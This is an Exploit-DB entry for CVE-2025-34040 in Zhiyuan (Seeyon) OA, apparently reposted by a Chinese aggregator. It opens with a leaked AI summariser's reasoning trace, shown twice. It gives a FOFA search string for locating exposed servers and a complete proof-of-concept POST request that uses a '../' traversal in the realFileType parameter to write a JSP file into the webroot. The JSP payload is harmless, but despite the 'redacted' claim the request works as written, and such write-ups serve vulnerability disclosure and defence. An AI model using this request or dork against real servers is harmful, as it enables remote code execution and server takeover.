[webapps] Zhiyuan OA - arbitrary file upload leading
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。首先,我得仔细阅读用户提供的文章内容,理解其中的关键点。 文章标题是关于致远OA的一个漏洞,允许任意文件上传。看起来这是一个安全漏洞,可能影响多个版本的软件。作者提到通过控制realFileType和fileId参数,可以上传恶意文件到webroot目录,进而执行远程代码。 接下来,我需要提取主要信息:漏洞类型是路径遍历和不当验证,影响版本包括5.0到8.0sp2。攻击者可以上传JSP文件并执行代码,导致远程代码执行和服务器完全控制。 现在要将这些信息浓缩成100字以内的总结。要注意不要使用“文章内容总结”这样的开头,直接描述即可。 可能会这样组织语言:致远OA多个版本存在文件上传漏洞,攻击者可利用路径遍历上传恶意JSP文件至webroot目录并执行代码,导致远程代码执行和服务器控制。 检查一下字数是否在限制内,并确保关键点都涵盖:漏洞、版本、攻击方式、影响。 </think> 致远OA多个版本存在任意文件上传漏洞,攻击者可通过控制`realFileType`和`fileId`参数上传恶意JSP文件至webroot目录并执行代码,导致远程代码执行和服务器完全控制。 2026-4-6 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:10 收藏
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。首先,我得仔细阅读用户提供的文章内容,理解其中的关键点。 文章标题是关于致远OA的一个漏洞,允许任意文件上传。看起来这是一个安全漏洞,可能影响多个版本的软件。作者提到通过控制realFileType和fileId参数,可以上传恶意文件到webroot目录,进而执行远程代码。 接下来,我需要提取主要信息:漏洞类型是路径遍历和不当验证,影响版本包括5.0到8.0sp2。攻击者可以上传JSP文件并执行代码,导致远程代码执行和服务器完全控制。 现在要将这些信息浓缩成100字以内的总结。要注意不要使用“文章内容总结”这样的开头,直接描述即可。 可能会这样组织语言:致远OA多个版本存在文件上传漏洞,攻击者可利用路径遍历上传恶意JSP文件至webroot目录并执行代码,导致远程代码执行和服务器控制。 检查一下字数是否在限制内,并确保关键点都涵盖:漏洞、版本、攻击方式、影响。 </think> 致远OA多个版本存在任意文件上传漏洞,攻击者可通过控制`realFileType`和`fileId`参数上传恶意JSP文件至webroot目录并执行代码,导致远程代码执行和服务器完全控制。 2026-4-6 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:10 收藏
# Exploit Title: Zhiyuan OA - arbitrary file upload leading
# Google Dork / FOFA: app="致远互联-OA" && title="V8.0SP2"
# Date: 1-11-2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://service.seeyon.com/
# Software Link: [vendor download / product page if available]
# Version: 5.0, 5.1–5.6sp1, 6.0–6.1sp2, 7.0–7.1sp1, 8.0–8.0sp2 (per NVD/VulnCheck)
# Tested on: MacOS
# CVE: CVE-2025-34040
Description:
A path-traversal / improper validation in the multipart file upload handling of Zhiyuan OA's `wpsAssistServlet` allows an unauthenticated actor (or actor able to reach upload endpoint) to place crafted files outside the intended directories by controlling `realFileType` and `fileId` parameters. Under affected configurations, an uploaded JSP can be stored in the webroot and executed, yielding remote code execution.
High-level reproduction template (redacted — non-actionable):
POST request to `/seeyon/wpsAssistServlet` with multipart/form-data. The `realFileType` parameter is used to resolve the target path; insufficient validation permits `..` sequences leading to writes under webapp root. The uploaded file contents must be controlled to produce a server-side executable file (e.g., JSP) — DO NOT include such server-side code here.
Impact:
- Remote code execution if the uploaded file is accessible and executable.
- Complete server compromise and pivoting to internal networks.
- Data exfiltration, persistence, and further lateral movement.
References:
- NVD CVE-2025-34040 (NVD entry – awaiting enrichment)
- VulnCheck advisory: https://vulncheck.com/advisories/zhiyuan-oa-system-path-traversal-file-upload
- CNVD entry: https://www.cnvd.org.cn/flaw/show/CNVD-2021-01627
- Vendor patch/notice: https://service.seeyon.com/patchtools/tp.html
POC;
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=......
Accept-Encoding: gzip
--......
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel
<% out.println("HelloWorld");%>
--.......--
文章来源: https://www.exploit-db.com/exploits/52490
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh